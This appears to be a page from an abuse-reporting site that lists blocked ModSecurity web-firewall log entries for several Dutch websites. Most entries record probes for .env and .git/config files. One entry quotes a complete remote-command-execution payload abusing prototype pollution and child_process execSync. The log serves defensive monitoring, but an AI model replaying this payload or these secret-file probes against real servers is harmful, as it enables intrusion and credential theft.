|
πΊπΈ
185.8.106.156
|
|
01/Apr/2026:08:16:02.026823 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
01/Apr/2026:08:16:02.026823 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 185.8.106.156] ModSecurity: Warning. String match within "/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/" at TX:header_name_accept-charset. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1128"] [id "920450"] [msg "HTTP header is restricted by policy (/accept-charset/)"] [data "Restricted header detected: /accept-charset/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/12.1"] [hostname "ramongames.nl"] [uri "/"] [unique_id "acy4IjJFaaY7DvNlgDp7IAAAAAg"]
01/Apr/2026:08:16:02.026823 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 185.8.106.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:a
...
show less
|
Web App Attack
|
|
π³π±
93.123.109.214
|
|
01/Apr/2026:07:50:49.618409 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
01/Apr/2026:07:50:49.618409 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "ramongames.nl"] [uri "/.env"] [unique_id "acyyObPpYiB_c5YzPUx1cwAAAAE"]
01/Apr/2026:07:50:49.618409 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [l
...
show less
|
Web App Attack
|
|
π³π±
204.76.203.25
|
|
01/Apr/2026:06:07:19.165887 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
01/Apr/2026:06:07:19.165887 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "im.vetspons.nl"] [uri "/.env"] [unique_id "acyZ96mKlTtq8MzpG6onZQAAAAE"]
01/Apr/2026:06:07:19.165887 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [li
...
show less
|
Web App Attack
|
|
πΊπΈ
3.87.185.234
|
|
01/Apr/2026:05:11:12.792395 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
01/Apr/2026:05:11:12.792395 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 3.87.185.234] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "www.ramongames.nl"] [uri "/.env"] [unique_id "acyM0D0ggXLKaFRuCedwrwAAAAc"]
01/Apr/2026:05:11:12.792395 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 3.87.185.234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [l
...
show less
|
Web App Attack
|
|
π³π±
204.76.203.25
|
|
01/Apr/2026:04:57:37.959032 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
01/Apr/2026:04:57:37.959032 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "mak.vetspons.nl"] [uri "/.env"] [unique_id "acyJoUq10wO7649fRbw7YAAAAAw"]
01/Apr/2026:04:57:37.959032 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [l
...
show less
|
Web App Attack
|
|
π³π±
45.148.10.238
|
|
01/Apr/2026:03:13:59.545446 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
01/Apr/2026:03:13:59.545446 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 45.148.10.238] ModSecurity: Warning. String match within "/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/" at TX:header_name_accept-charset. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1128"] [id "920450"] [msg "HTTP header is restricted by policy (/accept-charset/)"] [data "Restricted header detected: /accept-charset/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/12.1"] [hostname "ramongames.nl"] [uri "/.env"] [unique_id "acxxVy87yDfL07pmf8MwTgAAAAI"]
01/Apr/2026:03:13:59.545446 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 45.148.10.238] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr
...
show less
|
Web App Attack
|
|
π³π±
93.123.109.214
|
|
01/Apr/2026:02:53:14.968193 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
01/Apr/2026:02:53:14.968193 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "ramongames.nl"] [uri "/.env"] [unique_id "acxseisxoCiMPchQt4pi5gAAAA4"]
01/Apr/2026:02:53:14.968193 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [l
...
show less
|
Web App Attack
|
|
π³π±
172.94.9.128
|
|
01/Apr/2026:02:35:59.945464 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
01/Apr/2026:02:35:59.945464 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 172.94.9.128] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /netlify/functions/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "jordymarije.nl"] [uri "/netlify/functions/.env"] [unique_id "acxob4HiVdbjcUc2_MgCewAAAAw"]
01/Apr/2026:02:35:59.945464 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 172.94.9.128] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-
...
show less
|
Web App Attack
|
|
πΊπΈ
52.71.109.140
|
|
01/Apr/2026:02:40:25.501525 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
01/Apr/2026:02:40:25.501525 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 52.71.109.140] ModSecurity: Warning. String match within "/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/" at TX:header_name_accept-charset. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1128"] [id "920450"] [msg "HTTP header is restricted by policy (/accept-charset/)"] [data "Restricted header detected: /accept-charset/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/12.1"] [hostname "www.ramongames.nl"] [uri "/.git/config"] [unique_id "acxpeRBVQJpsikQq7NSEEAAAAAg"]
01/Apr/2026:02:40:25.501525 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 52.71.109.140] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME.
...
show less
|
Web App Attack
|
|
πΊπΈ
185.8.106.156
|
|
01/Apr/2026:02:15:44.877764 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
01/Apr/2026:02:15:44.877764 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 185.8.106.156] ModSecurity: Warning. String match within "/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/" at TX:header_name_accept-charset. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1128"] [id "920450"] [msg "HTTP header is restricted by policy (/accept-charset/)"] [data "Restricted header detected: /accept-charset/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/12.1"] [hostname "www.ramongames.nl"] [uri "/"] [unique_id "acxjsHUZ7avW8Gpliq1QDQAAAA0"]
01/Apr/2026:02:15:44.877764 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 185.8.106.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at
...
show less
|
Web App Attack
|
|
π·πΊ
37.72.140.3
|
|
01/Apr/2026:02:05:37.405759 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
01/Apr/2026:02:05:37.405759 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 37.72.140.3] ModSecurity: Warning. String match within "/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/" at TX:header_name_accept-charset. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1128"] [id "920450"] [msg "HTTP header is restricted by policy (/accept-charset/)"] [data "Restricted header detected: /accept-charset/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/12.1"] [hostname "ramongames.nl"] [uri "/"] [unique_id "acxhURBVQJpsikQq7NSDMwAAAAg"]
01/Apr/2026:02:05:37.405759 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 37.72.140.3] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anoma
...
show less
|
Web App Attack
|
|
π³π±
204.76.203.25
|
|
31/Mar/2026:23:34:49.645272 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
31/Mar/2026:23:34:49.645272 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "activeer.vetspons.nl"] [uri "/.env"] [unique_id "acw9-c3s5WBGLc-D_RI3WQAAAAc"]
31/Mar/2026:23:34:49.645272 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf
...
show less
|
Web App Attack
|
|
π³π±
204.76.203.25
|
|
31/Mar/2026:23:22:40.655867 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
31/Mar/2026:23:22:40.655867 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "radio.vetspons.nl"] [uri "/.env"] [unique_id "acw7IHgj9MvH8qsPbCkPLAAAAAY"]
31/Mar/2026:23:22:40.655867 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "94"] [id "949110"] [msg
...
show less
|
Web App Attack
|
|
π³π±
195.178.110.160
|
|
31/Mar/2026:23:06:18.223306 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
31/Mar/2026:23:06:18.223306 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/all/libraries/mailchimp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "ramongames.nl"] [uri "/site/all/libraries/mailchimp/.env"] [unique_id "acw3Sne5PMwxo7Jdw6bKEQAAABU"]
31/Mar/2026:23:06:18.223306 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/mod
...
show less
|
Web App Attack
|
|
π³π±
213.177.179.113
|
|
31/Mar/2026:22:28:56.874131 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
31/Mar/2026:22:28:56.874131 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 213.177.179.113] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "familievandemaat.nl"] [uri "/backend/.env"] [unique_id "acwuiMg4lWl9AbFWO0sikQAAABI"]
31/Mar/2026:22:28:56.874131 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 213.177.179.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCK
...
show less
|
Web App Attack
|
|
π³π±
172.94.9.253
|
|
31/Mar/2026:21:52:16.508930 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
31/Mar/2026:21:52:16.508930 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 172.94.9.253] ModSecurity: Warning. Pattern match "(?:\\\\\\\\$(?:\\\\\\\\((?:\\\\\\\\(.*\\\\\\\\)|.*)\\\\\\\\)|\\\\\\\\{.*\\\\\\\\})|[<>]\\\\\\\\(.*\\\\\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "367"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}} found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=process.mainmodule.require(child_process).execsync(buffer.from(6563686f2024282834312a3237312929 hex).tostring()).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "a
...
show less
|
Web App Attack
|
|
π³π±
195.178.110.159
|
|
31/Mar/2026:21:46:05.603555 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
31/Mar/2026:21:46:05.603555 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.159] ModSecurity: Warning. String match within "/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/" at TX:header_name_accept-charset. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1128"] [id "920450"] [msg "HTTP header is restricted by policy (/accept-charset/)"] [data "Restricted header detected: /accept-charset/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/12.1"] [hostname "familievandemaat.nl"] [uri "/.git/config"] [unique_id "acwkfW64GuhFmYB22_ETyAAAAAg"]
31/Mar/2026:21:46:05.603555 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.159] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FIL
...
show less
|
Web App Attack
|
|
π³π±
195.178.110.160
|
|
31/Mar/2026:16:02:10.595824 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
31/Mar/2026:16:02:10.595824 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/all/libraries/mailchimp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "jordymarije.nl"] [uri "/site/all/libraries/mailchimp/.env"] [unique_id "acvT4sg4lWl9AbFWO0siRwAAABI"]
31/Mar/2026:16:02:10.595824 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/mo
...
show less
|
Web App Attack
|
|
π«π·
185.177.72.50
|
|
31/Mar/2026:15:31:49.938556 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
31/Mar/2026:15:31:49.938556 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 185.177.72.50] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.vite"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "familievandemaat.nl"] [uri "/.env.vite"] [unique_id "acvMxVRBHT3Kx6XaVbBgzgAAAAI"]
31/Mar/2026:15:31:49.938556 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUA
...
show less
|
Web App Attack
|
|
π³π±
204.76.203.25
|
|
31/Mar/2026:14:10:34.117377 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
31/Mar/2026:14:10:34.117377 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "versie.vetspons.nl"] [uri "/.env"] [unique_id "acu5uscT-rlbAHUkIgw6ZAAAAAk"]
31/Mar/2026:14:10:34.117377 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"]
...
show less
|
Web App Attack
|
|
π³π±
195.178.110.241
|
|
31/Mar/2026:14:02:27.889244 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
31/Mar/2026:14:02:27.889244 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.241] ModSecurity: Warning. String match within "/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/" at TX:header_name_accept-charset. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1128"] [id "920450"] [msg "HTTP header is restricted by policy (/accept-charset/)"] [data "Restricted header detected: /accept-charset/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/12.1"] [hostname "familievandemaat.nl"] [uri "/.git/config"] [unique_id "acu308R57_3TD-L_F5LYiAAAAAI"]
31/Mar/2026:14:02:27.889244 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.241] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FIL
...
show less
|
Web App Attack
|
|
π³π±
204.76.203.25
|
|
31/Mar/2026:10:55:51.807923 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
31/Mar/2026:10:55:51.807923 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "www.familievandemaat.nl"] [uri "/.env"] [unique_id "acuMF7_5BrCNFxD6Mo3xLQAAAAg"]
31/Mar/2026:10:55:51.807923 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.c
...
show less
|
Web App Attack
|
|
π³π±
45.148.10.174
|
|
31/Mar/2026:10:22:34.708795 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
31/Mar/2026:10:22:34.708795 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "mak.vetspons.nl"] [uri "/.env"] [unique_id "acuESiSProt9hU2VBWDq4wAAAAU"]
31/Mar/2026:10:22:34.708795 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [l
...
show less
|
Web App Attack
|
|
π³π±
204.76.203.25
|
|
31/Mar/2026:10:18:25.929686 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
